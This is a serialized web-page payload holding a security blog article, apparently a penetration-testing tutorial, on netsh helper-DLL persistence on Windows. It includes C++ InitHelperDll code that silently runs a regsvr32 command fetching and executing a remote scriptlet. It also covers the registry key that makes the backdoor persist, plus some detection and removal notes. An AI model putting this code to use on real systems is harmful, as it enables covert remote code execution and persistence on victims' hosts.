[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fD7Mwq6qENP9APhIJ29P9z2k0HqDWbb1JwAi_7rOP_dg":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},88,"What are the requirements for writing a helper DLL for Netsh persistence?","The DLL must export a function named `InitHelperDll` with the signature `DWORD WINAPI InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)`. Inside this function, you can execute arbitrary code—for example, starting `cmd.exe` or loading shellcode. The export can be declared using a `.def` file or with `extern \"C\" __declspec(dllexport)`. Similar DLL‑based persistence techniques are discussed in [Exploitation Analysis of Executing Shellcode via Boolang Language](\u002Fnews\u002Fexploitation-analysis-of-executing-shellcode-via-boolang-language).","\u003Cp>The DLL must export a function named `InitHelperDll` with the signature `DWORD WINAPI InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)`. Inside this function, you can execute arbitrary code—for example, starting `cmd.exe` or loading shellcode. The export can be declared using a `.def` file or with `extern &quot;C&quot; __declspec(dllexport)`. Similar DLL‑based persistence techniques are discussed in [Exploitation Analysis of Executing Shellcode via Boolang Language](\u002Fnews\u002Fexploitation-analysis-of-executing-shellcode-via-boolang-language).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fnetsh-persistence\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-requirements-for-writing-a-helper-dll-for-netsh-persistence-1777485281639","InitHelperDll, DLL export, shellcode, WinExec, C++",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},23,"Netsh persistence","netsh-persistence","Learn how attackers use netsh to execute malicious DLLs for persistence. Includes DLL writing, exploitation, and detection methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Cp>\u003Cstrong>About:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Common commands of netsh\u003C\u002Fli>\u003Cli>Matthew Demaske's method of using netshell to execute malicious DLLs and maintain persistence on a host\u003C\u002Fli>\u003Cli>Write a DLL with the InitHelperDll function\u003C\u002Fli>\u003Cli>How to use\u003C\u002Fli>\u003Cli>Detection\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Table of Contents:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to common commands of netsh\u003C\u002Fli>\u003Cli>Testing Matthew Demaske's shared method—using netshell to execute malicious DLLs and maintain persistence on a host\u003C\u002Fli>\u003Cli>How to write a helper DLL in C++ with the export function InitHelperDll\u003C\u002Fli>\u003Cli>Practical exploitation testing\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.adaptforward.com\u002F2016\u002F09\u002Fusing-netshell-to-execute-evil-dlls-and-persist-on-a-host\u002F\u003C\u002Fp>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In penetration testing, using commands natively supported by the system can often bypass various detections and interceptions. For example, in my article 'Use bitsadmin to maintain persistence and bypass Autoruns', I introduced how to leverage the system's native bitsadmin tool to achieve persistence and evade detection by Autoruns.\u003C\u002Fp>\u003Cp>Matthew Demaske recently shared a method he discovered, which similarly utilizes commands natively supported by the system—using netshell to execute evil DLLs and persist on a host. This article will organize his method and supplement the DLL writing techniques not covered in detail in the original post.\u003C\u002Fp>\u003Ch2>0x01 Introduction to netsh\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Netsh is a powerful network configuration command-line tool provided by the Windows operating system. Common commands include:\u003C\u002Fp>\u003Cp>View IP configuration information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>View network configuration files:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Enable\u002Fdisable network adapters:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View all TCP connections:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Set local IP, subnet mask, and gateway IP:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Check firewall status:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Enable\u002Fdisable firewall:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>Enter 'netsh \u002F?' to view more detailed command help. Notably, the 'add' command is worth attention. Enter 'netsh add \u002F?' for more details:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>netsh add \u002F?\u003C\u002Fp>\u003Cp>The following commands are available:\u003C\u002Fp>\u003Cp>Commands in this context:\u003C\u002Fp>\u003Cp>add helper - Installs a helper DLL.\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>What would happen if we add a test DLL here?\u003Cbr>\u003Cbr>\u003Cbr>## 0x02 Writing a Helper DLL\u003Cbr>---\u003Cbr>Each helper DLL must contain an exported function named InitHelperDll\u003Cbr>\u003Cbr>After adding the helper DLL, netsh will call the exported function InitHelperDll in the helper DLL each time it initializes during loading\u003Cbr>\u003Cbr>Example of InitHelperDll:\u003Cbr>\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>DWORD\u003C\u002Fp>\u003Cp>WINAPI\u003C\u002Fp>\u003Cp>InitHelperDll(\u003C\u002Fp>\u003Cp>DWORD      dwNetshVersion,\u003C\u002Fp>\u003Cp>PVOID      pReserved\u003C\u002Fp>\u003Cp>)\u003C\u002Fp>\u003Cp>{\u003C\u002Fp>\u003Cp>NS_HELPER_ATTRIBUTES attMyAttributes;\u003C\u002Fp>\u003Cp>attMyAttributes.guidHelper = g_MyGuid;\u003C\u002Fp>\u003Cp>attMyAttributes.dwVersion  = 1;\u003C\u002Fp>\u003Cp>attMyAttributes.pfnStart   = NetshStartHelper;\u003C\u002Fp>\u003Cp>RegisterHelper( NULL, &amp;attMyAttributes );\u003C\u002Fp>\u003Cp>return NO_ERROR;\u003C\u002Fp>\u003Cp>}\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>\u003Cbr>For details on InitHelperDll, refer to the following link:\u003Cbr>\u003Cbr>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fwindows\u002Fdesktop\u002Fms708327(v=vs.85).aspx\u003Cbr>\u003Cbr>\u003Cbr>The article 'Code Execution of Regsvr32.exe' previously covered how to add an export function to a DLL, so here is a brief continuation:\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>Create a new C++ project, set up a DLL project, and add to the main file:\u003Cbr>\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>DWORD WINAPI InitHelperDll(DWORD dwNetshVersion,PVOID pReserved)\u003C\u002Fp>\u003Cp>{\u003C\u002Fp>\u003Cp>char *command=\"cmd.exe \u002Fc start regsvr32.exe \u002Fs \u002Fn \u002Fu \u002Fi:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct scrobj.dll\";\u003C\u002Fp>\u003Cp>WinExec(command,SW_HIDE);\u003C\u002Fp>\u003Cp>return 0;\u003C\u002Fp>\u003Cp>}\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Add export function declaration:\u003Cbr>\u003Cbr>File type:\u003Cbr>\u003Cbr>Text File\u003Cbr>\u003Cbr>Name:\u003Cbr>\u003Cbr>Same name file.def\u003Cbr>\u003Cbr>\u003Cbr>Write\u003Cbr>\u003Cbr>EXPORTS\u003Cbr>InitHelperDll\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>Compile then\u003Cbr>\u003Cbr>**Note:**\u003Cbr>\u003Cbr>Marc Smeets shared his POC code, defining export functions using another method:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>extern \"C\" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>The payload creates a new thread to execute shellcode\u003Cbr>\u003Cbr>**Project repository is as follows:**\u003Cbr>\u003Cbr>https:\u002F\u002Fgithub.com\u002Foutflankbv\u002FNetshHelperBeacon\u003Cbr>\u003Cbr>\u003Cbr>## 0x03 Adding a custom helper DLL\u003Cbr>---\u003Cbr>**Note:**\u003Cbr>\u003Cbr>Administrator privileges are required\u003Cbr>\u003Cbr>Add via cmd:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019796536_0_af6f1f7df0.png\">\u003C\u002Fp>\u003Cp>As shown below, registry keys are created synchronously\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019805910_1_2a13bb1566.jpeg\">\u003C\u002Fp>\u003Cp>Location: ``HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh\u003C\u002Fp>\u003Cp>Name: ``netshtest\u003C\u002Fp>\u003Cp>Type: ``REG_SZ\u003C\u002Fp>\u003Cp>Data: ``c:\\test\\netshtest.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Adding key-value directly via registry has the same effect as adding helper dll via netsh add\u003C\u002Fp>\u003Ch2>0x04 Trigger backdoor\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After helper dll is successfully added, c:\\test\\netshtest.dll will be loaded every time netsh is called\u003C\u002Fp>\u003Cp>As shown in the figure, running netsh command loads c:\\test\\netshtest.dll and launches calculator\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019821120_2_7841f858e5.png\">\u003C\u002Fp>\u003Cp>Verification:\u003C\u002Fp>\u003Cul>\u003Cli>Use Process Explorer to view dlls loaded by netsh process\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019831572_3_aff3185480.png\">\u003C\u002Fp>\u003Cul>\u003Cli>Can also be viewed in Event Properties of process attributes using Process Monitor\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019852899_4_5310ab78bd.png\">\u003C\u002Fp>\u003Ch2>0x05 Persistence\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Since netsh is a commonly used system command, there is a probability that it will be used normally by users, so simply launching netsh can trigger the payload.\u003C\u002Fli>\u003Cli>If added as a common startup item, it is also quite deceptive because only netsh.exe is displayed as starting.\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x06 Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor the registry location: ``HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh``\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>The `netsh show helper` command cannot detect newly added helper DLLs.\u003C\u002Fli>\u003Cli>Be aware of whether normal DLLs in the registry have been replaced.\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Removal\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Via cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Via registry:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>The prerequisite for Netsh Persistence is that administrator privileges have already been obtained.\u003C\u002Fli>\u003Cli>Some VPN software calls the netsh command during startup, which solves the self-starting issue of Netsh Persistence. This method is worth testing.\u003C\u002Fli>\u003Cli>If netsh is found in the startup items, it is worth noting, and it is necessary to check whether the corresponding registry key contains malicious helper DLLs.\u003C\u002Fli>\u003Cli>The default key values under the registry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh differ across systems, requiring comparison to determine if the default key values have been tampered with.\u003C\u002Fli>\u003C\u002Ful>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Cp>\u003Cstrong>About:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Common commands of netsh\u003C\u002Fli>\u003Cli>Matthew Demaske's method of using netshell to execute malicious DLLs and maintain persistence on a host\u003C\u002Fli>\u003Cli>Write a DLL with the InitHelperDll function\u003C\u002Fli>\u003Cli>How to use\u003C\u002Fli>\u003Cli>Detection\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Table of Contents:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to common commands of netsh\u003C\u002Fli>\u003Cli>Testing Matthew Demaske's shared method—using netshell to execute malicious DLLs and maintain persistence on a host\u003C\u002Fli>\u003Cli>How to write a helper DLL in C++ with the export function InitHelperDll\u003C\u002Fli>\u003Cli>Practical exploitation testing\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Reference:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.adaptforward.com\u002F2016\u002F09\u002Fusing-netshell-to-execute-evil-dlls-and-persist-on-a-host\u002F\u003C\u002Fp>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In penetration testing, using commands natively supported by the system can often bypass various detections and interceptions. For example, in my article 'Use bitsadmin to maintain persistence and bypass Autoruns', I introduced how to leverage the system's native bitsadmin tool to achieve persistence and evade detection by Autoruns.\u003C\u002Fp>\u003Cp>Matthew Demaske recently shared a method he discovered, which similarly utilizes commands natively supported by the system—using netshell to execute evil DLLs and persist on a host. This article will organize his method and supplement the DLL writing techniques not covered in detail in the original post.\u003C\u002Fp>\u003Ch2>0x01 Introduction to netsh\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Netsh is a powerful network configuration command-line tool provided by the Windows operating system. Common commands include:\u003C\u002Fp>\u003Cp>View IP configuration information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>View network configuration files:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Enable\u002Fdisable network adapters:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View all TCP connections:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Set local IP, subnet mask, and gateway IP:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Check firewall status:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Enable\u002Fdisable firewall:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>Enter 'netsh \u002F?' to view more detailed command help. Notably, the 'add' command is worth attention. Enter 'netsh add \u002F?' for more details:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>netsh add \u002F?\u003C\u002Fp>\u003Cp>The following commands are available:\u003C\u002Fp>\u003Cp>Commands in this context:\u003C\u002Fp>\u003Cp>add helper - Installs a helper DLL.\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>What would happen if we add a test DLL here?\u003Cbr>\u003Cbr>\u003Cbr>## 0x02 Writing a Helper DLL\u003Cbr>---\u003Cbr>Each helper DLL must contain an exported function named InitHelperDll\u003Cbr>\u003Cbr>After adding the helper DLL, netsh will call the exported function InitHelperDll in the helper DLL each time it initializes during loading\u003Cbr>\u003Cbr>Example of InitHelperDll:\u003Cbr>\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>DWORD\u003C\u002Fp>\u003Cp>WINAPI\u003C\u002Fp>\u003Cp>InitHelperDll(\u003C\u002Fp>\u003Cp>DWORD      dwNetshVersion,\u003C\u002Fp>\u003Cp>PVOID      pReserved\u003C\u002Fp>\u003Cp>)\u003C\u002Fp>\u003Cp>{\u003C\u002Fp>\u003Cp>NS_HELPER_ATTRIBUTES attMyAttributes;\u003C\u002Fp>\u003Cp>attMyAttributes.guidHelper = g_MyGuid;\u003C\u002Fp>\u003Cp>attMyAttributes.dwVersion  = 1;\u003C\u002Fp>\u003Cp>attMyAttributes.pfnStart   = NetshStartHelper;\u003C\u002Fp>\u003Cp>RegisterHelper( NULL, &amp;attMyAttributes );\u003C\u002Fp>\u003Cp>return NO_ERROR;\u003C\u002Fp>\u003Cp>}\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>\u003Cbr>\u003Cbr>For details on InitHelperDll, refer to the following link:\u003Cbr>\u003Cbr>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fwindows\u002Fdesktop\u002Fms708327(v=vs.85).aspx\u003Cbr>\u003Cbr>\u003Cbr>The article 'Code Execution of Regsvr32.exe' previously covered how to add an export function to a DLL, so here is a brief continuation:\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>Create a new C++ project, set up a DLL project, and add to the main file:\u003Cbr>\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>DWORD WINAPI InitHelperDll(DWORD dwNetshVersion,PVOID pReserved)\u003C\u002Fp>\u003Cp>{\u003C\u002Fp>\u003Cp>char *command=\"cmd.exe \u002Fc start regsvr32.exe \u002Fs \u002Fn \u002Fu \u002Fi:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct scrobj.dll\";\u003C\u002Fp>\u003Cp>WinExec(command,SW_HIDE);\u003C\u002Fp>\u003Cp>return 0;\u003C\u002Fp>\u003Cp>}\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Add export function declaration:\u003Cbr>\u003Cbr>File type:\u003Cbr>\u003Cbr>Text File\u003Cbr>\u003Cbr>Name:\u003Cbr>\u003Cbr>Same name file.def\u003Cbr>\u003Cbr>\u003Cbr>Write\u003Cbr>\u003Cbr>EXPORTS\u003Cbr>InitHelperDll\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>\u003Cbr>Compile then\u003Cbr>\u003Cbr>**Note:**\u003Cbr>\u003Cbr>Marc Smeets shared his POC code, defining export functions using another method:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>extern \"C\" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>The payload creates a new thread to execute shellcode\u003Cbr>\u003Cbr>**Project repository is as follows:**\u003Cbr>\u003Cbr>https:\u002F\u002Fgithub.com\u002Foutflankbv\u002FNetshHelperBeacon\u003Cbr>\u003Cbr>\u003Cbr>## 0x03 Adding a custom helper DLL\u003Cbr>---\u003Cbr>**Note:**\u003Cbr>\u003Cbr>Administrator privileges are required\u003Cbr>\u003Cbr>Add via cmd:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019796536_0_af6f1f7df0-1.png\">\u003C\u002Fp>\u003Cp>As shown below, registry keys are created synchronously\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019805910_1_2a13bb1566-1.jpeg\">\u003C\u002Fp>\u003Cp>Location: ``HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh\u003C\u002Fp>\u003Cp>Name: ``netshtest\u003C\u002Fp>\u003Cp>Type: ``REG_SZ\u003C\u002Fp>\u003Cp>Data: ``c:\\test\\netshtest.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Adding key-value directly via registry has the same effect as adding helper dll via netsh add\u003C\u002Fp>\u003Ch2>0x04 Trigger backdoor\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After helper dll is successfully added, c:\\test\\netshtest.dll will be loaded every time netsh is called\u003C\u002Fp>\u003Cp>As shown in the figure, running netsh command loads c:\\test\\netshtest.dll and launches calculator\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019821120_2_7841f858e5-1.png\">\u003C\u002Fp>\u003Cp>Verification:\u003C\u002Fp>\u003Cul>\u003Cli>Use Process Explorer to view dlls loaded by netsh process\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019831572_3_aff3185480-1.png\">\u003C\u002Fp>\u003Cul>\u003Cli>Can also be viewed in Event Properties of process attributes using Process Monitor\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019852899_4_5310ab78bd-1.png\">\u003C\u002Fp>\u003Ch2>0x05 Persistence\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Since netsh is a commonly used system command, there is a probability that it will be used normally by users, so simply launching netsh can trigger the payload.\u003C\u002Fli>\u003Cli>If added as a common startup item, it is also quite deceptive because only netsh.exe is displayed as starting.\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x06 Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor the registry location: ``HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh``\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>The `netsh show helper` command cannot detect newly added helper DLLs.\u003C\u002Fli>\u003Cli>Be aware of whether normal DLLs in the registry have been replaced.\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Removal\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Via cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003Cbr>Via registry:\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>The prerequisite for Netsh Persistence is that administrator privileges have already been obtained.\u003C\u002Fli>\u003Cli>Some VPN software calls the netsh command during startup, which solves the self-starting issue of Netsh Persistence. This method is worth testing.\u003C\u002Fli>\u003Cli>If netsh is found in the startup items, it is worth noting, and it is necessary to check whether the corresponding registry key contains malicious helper DLLs.\u003C\u002Fli>\u003Cli>The default key values under the registry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh differ across systems, requiring comparison to determine if the default key values have been tampered with.\u003C\u002Fli>\u003C\u002Ful>\u003C\u002Fbody>\u003C\u002Fhtml>",1731,"Onedaysec",4,"published","2026-02-02T08:20:05.024Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Netsh Persistence: Execute Malicious DLLs & Maintain Host Access","netsh persistence, malicious DLL, InitHelperDll, netshell, Windows backdoor, detection, defense, C++ DLL, Matthew Demaske",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],90,89,87,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.519Z","2026-07-23T16:00:59.286Z","draft","2026-07-23T16:03:30.062Z"]